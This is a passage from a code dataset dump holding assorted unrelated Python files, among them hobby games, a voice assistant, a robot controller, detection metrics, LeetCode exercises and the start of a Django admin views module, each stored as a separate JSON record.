label_arr = hsplit(data_arr, (2,))[-1][:, 0] # [:, 0] 将返回的二维数组转成一维数组\n data_arr = hsplit(data_arr, (2,))[0] # 返回一个二维数组\n return data_arr, label_arr\n\n\nif __name__ == '__main__':\n data_arr, label_arr = load_data_arr('../data/data_set3.0alpha.txt')\n print(data_arr)\n print(label_arr)\n","sub_path":"chapter8_ensemble_learning/adaptive_boosting.py","file_name":"adaptive_boosting.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"641389697","text":"# app/forms.py\n\nfrom wtforms import Field, Form, StringField\nfrom wtforms.validators import DataRequired, Length, URL\nfrom wtforms.widgets import TextInput\n\nfrom .models import Tag\n\n\n\nclass TagListField(Field):\n \"\"\"\n Custom field for (comma-separated) tag lists.\n Described here: http://wtforms.readthedocs.io/en/latest/fields.html#custom-fields\n \"\"\"\n \n widget = TextInput()\n \n def _value(self):\n if self.data:\n nameList = Tag.TagsToNames(self.data)\n return ', '.join(nameList)\n else:\n return ''\n \n def process_formdata(self, namesStr):\n if namesStr:\n namesList = [ tn.strip() for tn in namesStr[0].split(',') ]\n namesList = list( set(namesList) ) # remove duplicates\n self.data = Tag.NamesToTags(namesList) # also creates any new tags\n else:\n self.data = []\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"233475364","text":"from gui.view import View\nfrom game import Entity\n\nimport pyglet\nfrom pyglet.window import key\nfrom pytmx.util_pyglet import load_pyglet\nfrom util import pytmxutil\nimport pdb\n\n\nclass LevelView(View):\n \"\"\"docstring for LevelView\"\"\"\n def __init__(self, width, height, tiled_map):\n super(LevelView, self).__init__(width, height)\n self.tiled_map = tiled_map\n\n self.batch = pyglet.graphics.Batch()\n self.background = pyglet.graphics.OrderedGroup(0)\n self.entitiesGroup = pyglet.graphics.OrderedGroup(1)\n self.foreground = pyglet.graphics.OrderedGroup(2)\n self.sprites = []\n self.entities = []\n self.loadTiles(\"background\", self.background)\n self.loadTiles(\"foreground\", self.foreground)\n\n def loadTiles(self, groupname, group):\n tiles = self.tiled_map.get_layer_by_name(groupname)\n for x, y, image in tiles:\n if image != 0:\n temp = pyglet.sprite.Sprite(self.tiled_map.images[image], batch=self.batch, group=group)\n temp.x = x * 32\n temp.y = pytmxutil.transformY(y, self.height, self.tiled_map.tileheight)\n self.sprites.append(temp)\n\n def draw(self):\n self.batch.draw()\n","sub_path":"gui/levelview.py","file_name":"levelview.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389194814","text":"import mcpi.minecraft as minecraft\nimport mcpi.block as block\n\nmc = minecraft.Minecraft.create()\nmc.postToChat('Hello Minecraft!')\n\npos = mc.player.getTilePos()\nmc.postToChat('X=%d, Y=%d, Z=%d' % (pos.x, pos.y, pos.z))\nprint('X=%d, Y=%d, Z=%d' % (pos.x, pos.y, pos.z))\n\nmc.setBlock(pos.x+3, pos.y, pos.z, block.STONE.id)\n\nmc.setBlocks(pos.x+3, pos.y, pos.z, pos.x+10, pos.y+10, pos.z+10, block.STONE.id)\n\n","sub_path":"Unit 0 试听/08-建造多个方块.py","file_name":"08-建造多个方块.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"34916435","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 10 17:20:55 2017\n\n@author: chojnaal\n\"\"\"\n\nimport time\nimport dart as d\nimport random\n#import vRazor\n\n#dart = d.Dart()\n\ncoef = 10\n\ndef setHeading(dart, head):\n headOk = False\n tolerance = 5\n \n if head > 180:\n head = 180\n if head < -180:\n head = -180\n \n speed = 50\n while not headOk:\n headMes = dart.get_angles()\n# headMes = dart.get_angles() + 2 * coef * random.random() - coef\n# print(headMes)\n headErr = head - headMes\n \n if abs(headErr) < tolerance:\n headOk = True\n dart.motor(0,'left')\n dart.motor(0,'right')\n else:\n if (headErr > 0 and headErr < 180) or headErr < -180: #Turn left\n dart.motor(speed,'left', -1)\n dart.motor(speed,'right', 1)\n \n else: #Turn right\n dart.motor(speed,'left', 1)\n dart.motor(speed,'right', -1)\n \n time.sleep(0.1)\n\n\n\ndef setHeadingProp(dart, head, alpha = 2):\n headOk = False\n tolerance = 5\n \n if head > 180:\n head = 180\n if head < -180:\n head = -180\n \n maxSpeed = 130\n while not headOk:\n headMes = dart.get_angles()\n# headMes = dart.get_angles() + 2 * coef * random.random() - coef\n# print(headMes)\n headErr = head - headMes\n \n if (-180 < headErr < 180):\n delta = abs(headErr)\n else:\n delta = abs(headErr) - 180\n\n speed = delta * alpha\n if speed > maxSpeed:\n speed = maxSpeed\n \n if abs(headErr) < tolerance:\n headOk = True\n dart.motor(0,'left')\n dart.motor(0,'right')\n else:\n if (headErr > 0 and headErr < 180) or headErr < -180: #Turn left\n dart.motor(speed,'left', -1)\n dart.motor(speed,'right', 1)\n \n else: #Turn right\n dart.motor(speed,'left', 1)\n dart.motor(speed,'right', -1)\n \n time.sleep(0.1)\n print('fin set heading')\n \ndef giveHeadingProp(dart, head, alpha = 1.95):\n tolerance = 1\n \n if head > 180:\n head = 180\n if head < -180:\n head = -180\n \n maxSpeed = 130\n headMes = dart.get_angles()\n headErr = head - headMes\n \n if (-180 < headErr < 180):\n delta = abs(headErr)\n else:\n delta = abs(headErr) - 180\n\n speed = delta * alpha\n if speed > maxSpeed:\n speed = maxSpeed\n \n if abs(headErr) < tolerance:\n return 0, None\n else:\n if (headErr > 0 and headErr < 180) or headErr < -180:\n return speed, 'left'\n \n else: #Turn right\n return speed, 'right'\n \ndef goDartHeading(dart, head, speed, duration):\n setHeading(dart, head)\n t0 = time.time()\n t1 = time.time()\n while t1 - t0 < duration:\n left_speed = speed\n right_speed = speed\n turnSpeed, direction = giveHeadingProp(dart, head, speed/20)\n# print(turnSpeed)\n if direction:\n if direction == 'left':\n left_speed -= turnSpeed\n right_speed += turnSpeed\n elif direction == 'right':\n left_speed += turnSpeed\n right_speed -= turnSpeed\n# print(left_speed,right_speed)\n dart.motor(left_speed,'left')\n dart.motor(right_speed,'right')\n \n t1 = time.time()\n \n dart.motor(0,'left')\n dart.motor(0,'right')\n# dart.stop()\n print('fin heading')\n\ndef goLineOdo (dart, speed, duration):\n t0 = 0\n t1 = 0\n t0 = time.time()\n \n while t1-t0 <= duration:\n \n dart.motor(speed, 'left')\n dart.motor(speed, 'right')\n \n leftOdo = dart.get_odometers()[0]\n rightOdo = dart.get_odometers()[1]\n errOdo = abs(leftOdo-rightOdo)\n \n if errOdo < 6:\n time.sleep(0.2)\n \n else:\n if leftOdo > rightOdo:\n dart.motor(speed-7, 'left')\n else:\n dart.motor(speed-7, 'right')\n print(errOdo) \n t1=time.time() \n\nif __name__ == \"__main__\":\n myDart = d.Dart()\n time.sleep(1)\n# t1 = time.time()\n# t2 = time.time()\n# while t2-t1<2:\n# setHeading(myDart, 180)\n# t2 = time.time()\n \n# setHeadingProp(myDart, 180, 1.92)\n goDartHeading(myDart, 90, 100, 3.5)\n goDartHeading(myDart, -90, 100, 7)\n goDartHeading(myDart, 90, 100, 3.5)\n# print(myDart.get_angles())\n\n time.sleep(2) # example do nothing for 2 seconds\n\n myDart.stop()\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"dart_cmd.py","file_name":"dart_cmd.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604642855","text":"import speech_recognition as sr\nfrom time import ctime\nimport webbrowser\nimport time\nimport playsound\nimport os\nfrom gtts import gTTS\nimport random\n\n\nr = sr.Recognizer()\n\ndef record_audio(ask=False):\n with sr.Microphone() as source:\n if ask:\n speak(ask)\n audio = r.listen(source)\n voice_data = ''\n try:\n voice_data = r.recognize_google(audio)\n except sr.UnknownValueError:\n speak('Sorry,I didnot get that')\n except sr.RequestError:\n speak('Sorry,my speech service is down!') \n return voice_data \n\n\ndef speak(audio_string):\n tts = gTTS(text=audio_string,lang='en')\n r = random.randint(1,10000000)\n audio_file = 'audio-' + str(r) + '.mp3'\n tts.save(audio_file)\n playsound.playsound(audio_file)\n print(audio_string)\n os.remove(audio_file)\n\ndef respond(voice_data):\n if 'what is your name' in voice_data:\n speak('My name is CzN')\n\n if 'what time is it' in voice_data:\n speak(ctime())\n\n if 'search' in voice_data:\n search = record_audio('What do you want to search for') \n url = 'https://google.com/search?q=' + search\n webbrowser.get().open(url)\n speak('herspeake is what I found')\n\n if 'find location' in voice_data:\n location = record_audio('What do you want to search for') \n url = 'https://google.nl/maps/place/' + location + '/&'\n webbrowser.get().open(url)\n speak('here is what I found') \n\n if 'exit' in voice_data:\n exit() \n\n\ntime.sleep(1)\nspeak('How can I help you?')\n\nwhile 1:\n voice_data = record_audio()\n respond(voice_data)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"558564687","text":"\"\"\"\r\n Имя проекта: practicum_1\r\n Номер версии: 1.0\r\n Имя файла: 47.ру\r\n Автор: 2020 © А.И. Баскаков, Челябинск\r\n Лицензия использования: CC BY-NC 4.0 (https://creativecommons.org/licenses/by-nc/4.0/deed.ru)\r\n Дата создания: 16/12/2020\r\n Описание: Задача 47.\r\n #версия Python: 3.9\r\n\"\"\"\r\nimport random\r\n\r\nN = int(input(\"Количество элементов массива\"))\r\nB = int(input(\"Элемент массива 1\"))\r\nC = int(input(\"Элемент массива 2\"))\r\nA = [random.randint(-10, 10) for i in range(0, N)]\r\n\r\nprint(A)\r\n\r\nC = C + 1\r\ndel A[B:C]\r\n\r\nprint(A)\r\n","sub_path":"35.py","file_name":"35.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"290879220","text":"from game import Play, Discard, Clue, Move\nfrom game import Card, Tokens, Rules\nfrom typing import NamedTuple, List, Tuple\n\n\ndef oracle_player(state: None, log: List[NamedTuple], hands: List[List[Card]],\n rules: Rules, tokens: Tokens, slots: List[int],\n discard_pile: List[List[int]]) -> Tuple[None, Move, str]:\n \"\"\"\n Tsvika and Ofer's oracle player\n \"\"\"\n my_id = len(log) % len(hands)\n my_hand = hands[my_id]\n if my_hand[0].data is None:\n raise RuntimeError(\"I need to be omniscient\")\n\n # play something playable\n playable_card = None\n for card in my_hand:\n if slots[card.data.suit] == card.data.rank:\n if playable_card is None or playable_card.data.rank < card.data.rank:\n playable_card = card\n if playable_card is not None:\n return state, Play.create(playable_card.id), 'playable'\n\n def get_card_to_discard():\n # discard already played\n for card in my_hand:\n if slots[card.data.suit] > card.data.rank:\n return card.id, 'low'\n # discard unreachable\n for suit in range(rules.suits):\n max_rank_in_suit = None\n for rank in range(len(rules.ranks)):\n left_in_rank = rules.ranks[rank] - discard_pile[suit][rank]\n if rank >= slots[suit] and left_in_rank == 0:\n max_rank_in_suit = rank\n break\n if max_rank_in_suit:\n for card in my_hand:\n if card.data.suit == suit and card.data.rank > max_rank_in_suit:\n return card.id, 'high'\n # discard duplicates in own hand\n knowns = [card.data for card in my_hand]\n if len(set(knowns)) < len(knowns):\n for i, known in enumerate(knowns):\n for known2 in knowns[i+1:]:\n if known == known2:\n return my_hand[i].id, 'dup'\n # discard duplicates with others\n knowns = [card.data for card in my_hand]\n for hand in hands[:my_id]+hands[my_id+1:]:\n knowns2 = [card.data for card in hand]\n if len(set(knowns+knowns2)) < len(knowns)+len(set(knowns2)):\n for i, known in enumerate(knowns):\n for known2 in knowns2:\n if known == known2:\n return my_hand[i].id, 'dup2'\n return None, ''\n\n # discard something discardable\n if tokens.clues < rules.max_tokens.clues:\n card, note = get_card_to_discard()\n if card is not None:\n return state, Discard.create(card), 'pass/d/' + note\n\n # nothing useful to do\n # try to pass with useless clue\n if tokens.clues > 0:\n player = (my_id + 1) % len(hands)\n if hands[player]:\n return state, Clue.create(player, 'suit', hands[player][0].data.suit), 'pass/c'\n\n # try to pass with false play\n if tokens.lives > 1:\n card, note = get_card_to_discard()\n if card is not None:\n return state, Play.create(card), 'pass/p/' + note\n\n # you have to throw something useful. try the farthest from the suit\n # look for an expandable card\n diff = None\n throw = None\n for card in my_hand:\n card_diff = card.data.rank - slots[card.data.suit]\n if diff is None or card_diff > diff:\n if rules.ranks[card.data.rank] - discard_pile[card.data.suit][card.data.rank] > 1:\n diff = card_diff\n throw = card\n note = ''\n # look for a non expandable card, if you must (BOO!)\n if diff is None:\n note = '/bad'\n for card in my_hand:\n card_diff = card.data.rank - slots[card.data.suit]\n if diff is None or card_diff > diff:\n diff = card_diff\n throw = card\n assert throw is not None\n\n # throw by discard\n if tokens.clues < rules.max_tokens.clues:\n return state, Discard.create(throw.id), 'throw/d' + note\n\n # throw by false play\n return state, Play.create(throw.id), 'throw/p' + note\n","sub_path":"players/oracle.py","file_name":"oracle.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"157457246","text":"def twonums_sum(m, lst):\n for i in range(0, len(lst)):\n for j in range(0, len(lst)):\n if lst[i] + lst[j] == int(m):\n return i, j\n else:\n return -1\n\n\nlist1 = [1,4,5,6,7,8,9,10,11,12,13,15,18,19,20,21,29,34,54,65]\nn = input()\nif twonums_sum(n, list1) == -1:\n print('not found')\nelse:\n print(twonums_sum(n, list1))\n\n","sub_path":"人工智能程序设计/class/3.28/3.28_4.py","file_name":"3.28_4.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"78412028","text":"import numpy as np\n\n\ndef iou(boxA,boxB):\n # For each prediction, compute its iou over all the boxes in that frame\n boxA = list(filter(None, boxA))#remove the parked cars bbox\n if boxA == []:\n return None\n boxA = np.array(boxA)\n x11, y11, x12, y12 = np.split(boxA, 4, axis=1)\n x21, y21, x22, y22 = np.split(boxB, 4, axis=1)\n\n # Calculate the intersection in the bboxes\n xmin = np.maximum(x11, np.transpose(x21))\n ymin = np.maximum(y11, np.transpose(y21))\n xmax = np.minimum(x12, np.transpose(x22))\n ymax = np.minimum(y12, np.transpose(y22))\n w = np.maximum(xmax - xmin + 1.0, 0.0)\n h = np.maximum(ymax - ymin + 1.0, 0.0)\n intersection = w * h\n\n # Union\n areaboxA = (x12 - x11 + 1.0) * (y12 - y11 + 1.0)\n areaboxB = (x22 - x21 + 1.0) * (y22 - y21 + 1.0)\n union = areaboxA + np.transpose(areaboxB) - intersection\n\n iou = intersection / union\n\n\n return iou\n\n\n\ndef ap_score(gt,pred,num_bboxes,ovthresh=0.5):\n\n\n # go down dets and mark TPs and FPs\n num_frames = gt[-1]['frame']\n nd = num_bboxes\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n idx_bbox = 0\n iouList = []\n initFrame = pred[0]['frame']\n #gt = cutGT(gt, initFrame)\n for f in range(num_frames+1-initFrame):\n bbgt = gt[f]['bbox']\n bboxes_pred = pred[f]['bbox']\n for box in bboxes_pred:\n bbpred = np.array([box])\n if bbpred[0] is not None:\n iouScore = iou(bbgt,bbpred)\n if iouScore is None:\n fp[idx_bbox] = 1.0\n else:\n maxScore = max(iouScore)\n index = np.argmax(iouScore)\n iouList.append(maxScore)\n\n if maxScore > ovthresh:\n if not gt[f]['is_detected'][index]:\n # We have detected an existing bbox in the gt\n gt[f]['is_detected'][index] = True\n tp[idx_bbox] = 1.0\n else:\n fp[idx_bbox] = 1.0\n else:\n fp[idx_bbox] = 1.0\n else:\n iouScore = iou(bbgt, bbpred)\n if iouScore is None:\n nobbox = 1\n else:\n fp[idx_bbox] = 1.0\n\n idx_bbox += 1\n # compute precision recall\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n rec = tp / float(idx_bbox)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n\n # compute AP with the 11 point metric\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.0\n\n return rec, prec, ap, np.mean(iouList)\n\n\n\ndef VOC_ap_score(gt,pred,num_bboxes,ovthresh=0.5):\n\n\n def sort_key_def(elem):\n return elem[2]\n\n # Sort by confidence\n pred_BB = []\n for i in range(len(pred)):\n for i_bb in range(len(pred[i]['bbox'])):\n pred_BB.append([i, pred[i]['bbox'][i_bb], pred[i]['score'][i_bb]])\n pred_bb_sorted = sorted(pred_BB, reverse=True, key=sort_key_def)\n\n meanIoU = np.zeros(len(pred))\n\n # go down dets and mark TPs and FPs\n nd = num_bboxes\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n\n for br in range(len(pred_bb_sorted)):\n #for box in bboxes_pred:\n frame_id = pred_bb_sorted[br][0]\n bbpred = np.array([pred_bb_sorted[br][1]]).astype(float)\n bbgt = gt[frame_id]['bbox'].astype(float)\n\n iouScore = iou(bbgt,bbpred)\n maxScore = max(iouScore)\n meanIoU[frame_id] += maxScore[0]\n index = np.argmax(iouScore)\n\n if maxScore > ovthresh:\n if not gt[frame_id]['is_detected'][index]:\n # We have detected an existing bbox in the gt\n gt[frame_id]['is_detected'][index] = True\n tp[br] = 1.0\n else:\n fp[br] = 1.0\n else:\n fp[br] = 1.0\n\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n\n # compute precision recall\n rec = tp / float(num_bboxes)\n # avoid divide by zero in case the first detection matches a difficult\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n\n # compute AP with the 11 point metric\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.0\n\n for i in range(len(meanIoU)):\n meanIoU[i] = meanIoU[i] / len(pred[i]['bbox'])\n\n return rec, prec, ap, meanIoU\n# # Hem de modificar la funció aquesta per a que usar-la amb les nostres dades (és el mAP calculat amb Detectron2)\n# #https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/pascal_voc_evaluation.py\n# def voc_eval(detpath, annopath, imagesetfile, classname, ovthresh=0.5, use_07_metric=False):\n# \"\"\"rec, prec, ap = voc_eval(detpath,\n# annopath,\n# imagesetfile,\n# classname,\n# [ovthresh],\n# [use_07_metric])\n# Top level function that does the PASCAL VOC evaluation.\n# detpath: Path to detections\n# detpath.format(classname) should produce the detection results file.\n# annopath: Path to annotations\n# annopath.format(imagename) should be the xml annotations file.\n# imagesetfile: Text file containing the list of images, one image per line.\n# classname: Category name (duh)\n# [ovthresh]: Overlap threshold (default = 0.5)\n# [use_07_metric]: Whether to use VOC07's 11 point AP computation\n# (default False)\n# \"\"\"\n# # assumes detections are in detpath.format(classname)\n# # assumes annotations are in annopath.format(imagename)\n# # assumes imagesetfile is a text file with each line an image name\n#\n# # first load gt\n# # read list of images\n# with PathManager.open(imagesetfile, \"r\") as f:\n# lines = f.readlines()\n# imagenames = [x.strip() for x in lines]\n#\n# # load annots\n# recs = {}\n# for imagename in imagenames:\n# recs[imagename] = parse_rec(annopath.format(imagename))\n#\n# # extract gt objects for this class\n# class_recs = {}\n# npos = 0\n# for imagename in imagenames:\n# R = [obj for obj in recs[imagename] if obj[\"name\"] == classname]\n# bbox = np.array([x[\"bbox\"] for x in R])\n# difficult = np.array([x[\"difficult\"] for x in R]).astype(np.bool)\n# # difficult = np.array([False for x in R]).astype(np.bool) # treat all \"difficult\" as GT\n# det = [False] * len(R)\n# npos = npos + sum(~difficult)\n# class_recs[imagename] = {\"bbox\": bbox, \"difficult\": difficult, \"det\": det}\n#\n# # read dets\n# detfile = detpath.format(classname)\n# with open(detfile, \"r\") as f:\n# lines = f.readlines()\n#\n# splitlines = [x.strip().split(\" \") for x in lines]\n# image_ids = [x[0] for x in splitlines]\n# confidence = np.array([float(x[1]) for x in splitlines])\n# BB = np.array([[float(z) for z in x[2:]] for x in splitlines]).reshape(-1, 4)\n#\n# # sort by confidence\n# sorted_ind = np.argsort(-confidence)\n# BB = BB[sorted_ind, :]\n# image_ids = [image_ids[x] for x in sorted_ind]\n#\n# # go down dets and mark TPs and FPs\n# nd = len(image_ids)\n# tp = np.zeros(nd)\n# fp = np.zeros(nd)\n# for d in range(nd):\n# R = class_recs[image_ids[d]]\n# bb = BB[d, :].astype(float)\n# ovmax = -np.inf\n# BBGT = R[\"bbox\"].astype(float)\n#\n# if BBGT.size > 0:\n# # compute overlaps\n# # intersection\n# ixmin = np.maximum(BBGT[:, 0], bb[0])\n# iymin = np.maximum(BBGT[:, 1], bb[1])\n# ixmax = np.minimum(BBGT[:, 2], bb[2])\n# iymax = np.minimum(BBGT[:, 3], bb[3])\n# iw = np.maximum(ixmax - ixmin + 1.0, 0.0)\n# ih = np.maximum(iymax - iymin + 1.0, 0.0)\n# inters = iw * ih\n#\n# # union\n# uni = (\n# (bb[2] - bb[0] + 1.0) * (bb[3] - bb[1] + 1.0)\n# + (BBGT[:, 2] - BBGT[:, 0] + 1.0) * (BBGT[:, 3] - BBGT[:, 1] + 1.0)\n# - inters\n# )\n#\n# overlaps = inters / uni\n# ovmax = np.max(overlaps)\n# jmax = np.argmax(overlaps)\n#\n# if ovmax > ovthresh:\n# if not R[\"difficult\"][jmax]:\n# if not R[\"det\"][jmax]:\n# tp[d] = 1.0\n# R[\"det\"][jmax] = 1\n# else:\n# fp[d] = 1.0\n# else:\n# fp[d] = 1.0\n#\n# # compute precision recall\n# fp = np.cumsum(fp)\n# tp = np.cumsum(tp)\n# rec = tp / float(npos)\n# # avoid divide by zero in case the first detection matches a difficult\n# # ground truth\n# prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n# ap = voc_ap(rec, prec, use_07_metric)\n#\n# return rec, prec, ap\n","sub_path":"week2/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"262312831","text":"# pesquisa.py\n\nimport sys\nfrom PySide2.QtWidgets import (QApplication, QWidget, QLabel, \n QPushButton, QPushButton, QCheckBox, \n QButtonGroup, QHBoxLayout, QVBoxLayout)\nfrom PySide2.QtGui import QFont\n\nclass Pesquisa(QWidget):\n def __init__(self):\n super().__init__()\n self.iniciaUI()\n\n def iniciaUI(self):\n \"\"\"\n Inicializa a janela e mostra seu conteuda na tela\n \"\"\"\n\n self.setGeometry(100,100, 400, 230)\n self.setWindowTitle(\"Pesquisa de Opinião\")\n self.displayWidgets()\n\n self.show()\n\n def displayWidgets(self):\n \"\"\"\n Configura os widgets da app\n \"\"\"\n\n titl_lbl = QLabel(\"Pizzaria Pinocchio\")\n titl_lbl.setFont(QFont(\"Arial\", 17))\n qust_lbl = QLabel(\"Como você classificaria o atendimento hoje?\")\n\n titl_hbox = QHBoxLayout()\n titl_hbox.addStretch()\n titl_hbox.addWidget(titl_lbl)\n titl_hbox.addStretch()\n\n escala = [\"Insatisfeito\", \"Médio\", \"Satisfeito\"]\n\n escala_hbox = QHBoxLayout()\n escala_hbox.setSpacing(60)\n\n escala_hbox.addStretch()\n for eval in escala:\n eval_lbl = QLabel(eval, self)\n escala_hbox.addWidget(eval_lbl)\n escala_hbox.addStretch()\n\n btng_hbox = QHBoxLayout()\n btng_hbox.setSpacing(100)\n escala_bgrp = QButtonGroup(self)\n btng_hbox.addStretch()\n for btn in range(len(escala)):\n eval_chkb = QCheckBox(str(btn), self)\n btng_hbox.addWidget(eval_chkb)\n escala_bgrp.addButton(eval_chkb)\n btng_hbox.addStretch()\n\n escala_bgrp.buttonClicked.connect(self.checkboxClicked)\n\n close_btn = QPushButton(\"Fechar\", self)\n close_btn.clicked.connect(self.close)\n\n vbox = QVBoxLayout()\n vbox.addLayout(titl_hbox)\n vbox.addWidget(qust_lbl)\n vbox.addStretch(1)\n vbox.addLayout(escala_hbox)\n vbox.addLayout(btng_hbox)\n vbox.addStretch(2)\n vbox.addWidget(close_btn)\n\n self.setLayout(vbox)\n\n\n def checkboxClicked(self, chkb):\n \"\"\"\n Imprime o texto do checkbox selecionado\n \"\"\"\n\n print(\"{} Selecionado.\",format(chkb.text()))\n\n#Executando o App\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Pesquisa()\n sys.exit(app.exec_())\n\n","sub_path":"EC_Pesquisa/pesquisa.py","file_name":"pesquisa.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"49698982","text":"# File: T (Python 2.3)\n\nimport unittest\nfrom ipl.types.Bunch import Bunch\n\ndef accessBadMember():\n data = Bunch(a = 1, b = 2, c = 3)\n return data.d\n\n\nclass TestBunch(unittest.TestCase):\n \n def testBunch(self):\n bearName = 'Edward'\n myYear = 1066\n b = Bunch(bear = bearName, year = myYear)\n self.failUnless(b.bear == bearName)\n self.failUnless(b.year == myYear)\n\n \n def testBadMember(self):\n self.assertRaises(AttributeError, accessBadMember)\n\n \n def testAssignment(self):\n myFruit = 'Loganberry'\n food = Bunch(yoghurt = 'Raspberry', cheese = 'Brie')\n food.fruit = myFruit\n self.failUnless(food.fruit == myFruit, 'Testing assignment')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"Server/ipl/types/tests/TestBunch.py","file_name":"TestBunch.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294060181","text":"\n### one code one day\n### 2020/04/17\n### leetcode 394 字符串解码\n\n### 栈思想\ndef decodeString(self, s: str) -> str:\n res = \"\"\n stack = []\n for char in s:\n if(char == ']'):\n ### 找字符串\n temp_str = \"\"\n while(stack[-1] != '['):\n temp_str = stack.pop() + temp_str\n stack.pop()\n ### 找个数\n temp_num = \"\"\n while(len(stack) >= 1 and stack[-1] >= '0' and stack[-1] <= '9'):\n temp_num = stack.pop() + temp_num\n ### 再进栈\n for ch in temp_str * int(temp_num):\n stack.append(ch)\n else:\n stack.append(char)\n return \"\".join(stack)\n\n### 2020/05/28\n### 递归法\ndef decodeString(self, s: str) -> str:\n def find(start, end):\n count = 0\n for i in range(start, end+1):\n if(s[i] == '['):\n count += 1\n elif(s[i] == ']'):\n count -= 1\n if(count == 0):\n return i\n\n def decode(start, end):\n res = ''\n i = start\n while(i <= end):\n if('0' <= s[i] <= '9'):\n strNum = ''\n while('0'<=s[i]<='9'):\n strNum += s[i]\n i += 1\n idx = find(i, end)\n res = res + int(strNum) * decode(i+1, idx-1)\n i = idx + 1\n else:\n res += s[i]\n i += 1\n return res\n return decode(0, len(s)-1)\n","sub_path":"栈/decodeString.py","file_name":"decodeString.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"470847531","text":"from tkinter import *\nfrom tkinter import ttk\n\n\nwindow=Tk()\n\nlastx, lasty = 0, 0\n\ndef xy(event):\n global lastx, lasty\n lastx, lasty = event.x, event.y\n\ndef punto():\n global lastx,lasty\n canvasD.cr\n\nwindow.columnconfigure(0, weight=1)\nwindow.rowconfigure(0, weight=1)\ncanvasD=Canvas(window,relief=RAISED,scrollregion=(0, 0, 1000, 1000))\ncanvasD.pack()\ncanvasD.configure(background=\"blue\")\n\ncanvasC=Canvas(window,relief=RAISED)\ncanvasC.pack()\ncanvasC.configure(background=\"red\")\npoints = [325, 0, 300,25, 350, 25]\nuparrow=canvasC.create_polygon(points,fill=\"black\")\n\npoints2 = [325, 55, 300,30, 350, 30]\ndownarrow=canvasC.create_polygon(points2,fill=\"black\")\n\npoints3=[0, 25, 25,0, 25, 50]\nleftarrow=canvasC.create_polygon(points3,fill=\"black\")\n\npoints4=[55, 25, 30,0, 30, 50]\nrightarrow=canvasC.create_polygon(points4,fill=\"black\")\n\ncanvasC.bind(\"\", lambda e:print(e.x,e.y))\nwindow.update()\nwindow.maxsize(500,340)\nwindow.minsize(300,340)\nwindow.mainloop()\n\n","sub_path":"untitled/telesketch/telesketch.py","file_name":"telesketch.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541533215","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpRequest\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils import simplejson\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.paginator import Paginator\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nimport datetime\nfrom datetime import date\nfrom django.utils import dateformat\nfrom django.utils import timezone\nfrom django.core.cache import cache\n\nfrom theriver.utils import *\nfrom theriver.models import *\nfrom adminka.forms import *\nimport pushwoosh\n\n\npush = pushwoosh.Pushwoosh(settings.PUSHWOOSH_LOGIN, settings.PUSHWOOSH_PASS, settings.PUSHWOOSH_APP_ID)\n\n# pyapns_wrapper = PyapnsWrapper(settings.APNS_HOST,\n# 